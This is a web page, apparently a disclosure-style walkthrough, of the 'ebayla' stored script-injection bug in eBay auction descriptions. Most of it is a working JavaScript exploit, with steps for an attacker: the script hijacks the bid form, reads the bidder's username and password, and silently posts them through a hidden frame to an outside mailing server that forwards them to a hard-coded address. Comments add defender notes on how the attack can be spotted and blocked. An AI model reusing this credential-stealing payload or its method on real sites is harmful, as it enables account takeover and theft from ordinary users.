THE EBAYLA BUG WALK-THROUGH

This page demonstrates how the ebayla bug can be exploited by someone using minimal resources to steal usernames and passwords from eBay users. The resources required to launch the attack are minimal and freely available. The following exploit is written to work with Netscape Communicator only. The goal is to demonstrate that using only the items listed below, a malicious user can acquire eBay usernames and passwords. (To see a more efficient (2 line) version of the code that uses a Perl script, visit the live demo at eBay.)

INGREDIENTS:

  • 1 Computer with Internet Access
  • 1 email account

STEP 1:
Visit ebay.com and register for a free user account.

STEP 2:
Go to the seller's area to post an item for auction. When asked to enter the description of the item, post the following description, containing the ebayla code. The first line of the script indicates the email address to which usernames/passwords are to be sent.

1 car, comes with windows.  crashes frequently.  toy.<hr>

WARNING do not bid on this item!! This auction is a demonstration of the 
<a href="http://www.because-we-can.com/ebayla/default.htm">ebayla bug</a>.  
If you place/review a bid, your username and password will be mailed to 
http://www.because-we-can.com.


<script>
// Destination address for the harvested credentials: ebayla() appends it to the
// third-party mailer URL (mailUrl), so whatever that mailer receives is forwarded here.
// Implicit global (no `var`). A hard-coded e-mail address inside a <script> block in a
// seller-supplied description is exactly the kind of content a listing filter should reject.
recipient = "blue_adept@because-we-can.com";

// Rewrites the current (eBay-origin) page into a two-frame layout so that the
// victim's bid still goes through while a copy of the credentials leaves the site:
//   - frame "t" receives place_bid, the genuine eBay bid URL; rows="100%,*" gives it
//     the whole window, so the page looks normal to the user;
//   - frame "b" is the zero-height remainder. go(), run from the frameset's onLoad,
//     writes a form into it whose hidden username/password fields are POSTed to
//     mailUrl by the body's own onLoad — no user action needed.
// Parameters: place_bid - eBay bid URL built in ebayla(); mailUrl - URL of the
// external mailer; username, password - values already passed through urlEncode().
// From a defender's view the tell-tale is an auto-submitting form in a hidden frame
// whose action points at a host outside eBay; output-encoding of the seller description
// (so that <script> is rendered as text, not executed) removes the whole vector.
function printframeset(place_bid, mailUrl, username, password){
  document.open(); 
  document.writeln('<script>');
  document.writeln('function go(){');
  document.writeln('top.b.document.open();');
  document.writeln('top.b.document.writeln("<body onLoad=document.form1.submit()>");');
  document.writeln('top.b.document.writeln("<form name=form1 method=POST action=' + mailUrl + '>");');
  document.writeln('top.b.document.writeln("<input type=hidden name=username value=' + username + '>");');
  document.writeln('top.b.document.writeln("<input type=hidden name=password value=' + password + '>");');
  document.writeln('top.b.document.writeln("</form>")');
  document.writeln('top.b.document.close();');
  document.writeln('}');
  // The closing tag is split in two so the literal text "</script>" does not appear
  // inside this script block; the description is injected into the page as raw HTML,
  // and an unsplit closing tag would terminate the outer <script> early.
  document.writeln('</scr' + 'ipt>');
  document.writeln('</head>');
  document.writeln('<frameset rows="100%,*" onLoad="go()">');
  document.writeln('<frame name="t" src="' + place_bid + '">');
  document.writeln('<frame name="b" src="">');
  document.writeln('</frameset>');
  document.close();
}

// Hand-rolled percent-encoder for the values placed into the eBay query string.
// Walks the input one character at a time; the characters listed in the switch are
// replaced by their %XX form, a space becomes "+", and everything else is copied through.
// Parameter: inStr - string to encode. Returns the encoded string.
// Notes for the reader:
//   - outStr, i and aChar are assigned without `var`, so they are implicit globals.
//   - The author starts outStr with a single space (commented as a Netscape workaround)
//     and strips it again on the last line, so the result has no leading space.
//   - The character set differs from the browser's built-in escape()/encodeURIComponent()
//     (e.g. "~", "!", "'" and "(" are encoded here); treat it as its own encoding table.
function urlEncode(inStr)  {
  outStr=' ';  //not '' for a NS bug!
  for (i=0; i < inStr.length; i++)  {
    aChar=inStr.substring (i, i+1);
    switch(aChar){
      case '%': outStr += "%25"; break; case ',': outStr += "%2C"; break;
      case '/': outStr += "%2F"; break; case ':': outStr += "%3A"; break;
      case '~': outStr += "%7E"; break; case '!': outStr += "%21"; break;
      case '"': outStr += "%22"; break; case '#': outStr += "%23"; break;
      case '$': outStr += "%24"; break; case "'": outStr += "%27"; break;
      case '`': outStr += "%60"; break; case '^': outStr += "%5E"; break;
      case '&': outStr += "%26"; break; case '(': outStr += "%28"; break;
      case ')': outStr += "%29"; break; case '+': outStr += "%2B"; break;
      case '{': outStr += "%7B"; break; case '|': outStr += "%7C"; break;
      case '}': outStr += "%7D"; break; case ';': outStr += "%3B"; break;
      case '<': outStr += "%3C"; break; case '=': outStr += "%3D"; break;
      case '>': outStr += "%3E"; break; case '?': outStr += "%3F"; break;
      case '[': outStr += "%5B"; break; case '\\': outStr += "%5C"; break;
      case ']': outStr += "%5D"; break; case ' ': outStr += "+"; break;
      default: outStr += aChar;
    }
  }
  // Drop the leading placeholder space added above.
  return outStr.substring(1, outStr.length);
}

// Hijacks the first form on the page: its action is changed from eBay's bid handler to a
// javascript: URL, so submitting the form runs ebayla() in the page's own origin instead of
// posting directly to eBay. This only works because the seller description is rendered as
// live HTML/script on the eBay page that also hosts the bid form (see the STEP 2 text).
function newaction(){
  window.document.forms[0].action="javascript:ebayla()";
}

// Runs when the victim submits the hijacked bid form. Reads the item, userid, pass and
// maxbid fields of that form, rebuilds the legitimate eBay MakeBid URL from them (so the
// bid is still placed), and builds the external mailer URL; both are handed to
// printframeset(), which loads the bid and sends the credentials side by side.
// All locals here are implicit globals (no `var`).
// The fact that the page's own form exposes the user's password to any script running on
// the same origin is what turns a description-injection bug into credential theft.
function ebayla(){
  item = urlEncode(window.document.forms[0].item.value);
  username = urlEncode(window.document.forms[0].userid.value);
  password = urlEncode(window.document.forms[0].pass.value);
  maxbid = urlEncode(window.document.forms[0].maxbid.value);
  
  // Genuine eBay bid endpoint; the credentials travel in its query string exactly as
  // the original form would have sent them.
  bid_script = "http://cgi.ebay.com/aw-cgi/eBayISAPI.dll";
  bid_query_string = "?MfcISAPICommand=MakeBid&item=" + item + "&userid=" + username
  + "&pass=" + password + "&maxbid=" + maxbid;
  place_bid = bid_script + bid_query_string;

  // Third-party server-side mailing script (see the Note at the end of the page).
  // The "?|" + recipient form is presumably that mailer's own convention for naming
  // the forwarding address — not something the page explains.
  mailscript = "http://204.225.88.132/cgi-bin/form1";
  mailUrl = mailscript + '?|' + recipient;
  printframeset(place_bid, mailUrl, username, password);
}

// Arming logic, run as soon as the description's script executes. The twelfth link of
// the page is compared against the account-status URL (relying on the link object
// converting to its href string); when it does not match, newaction() is scheduled one
// second later to replace the bid form's action. The page does not say which eBay view
// the link check is meant to distinguish, so that remains an assumption of the author's.
if(document.links[11] != "http://pages.ebay.com/aw/account-status.html"){
  setTimeout("newaction()", 1000);
}

</script>

STEP 4: Wait for users to place/review bids on the item. Shortly afterwards, you will receive an e-mail message that contains the user's username and password.

Note:
In the exploit described above, the part of the program that does the actual "dirty-work" of mailing the password and username is a randomly chosen server-side mailing script we found on the web. There are many equivalent and publicly available server-side mailing programs that can be used in its place.
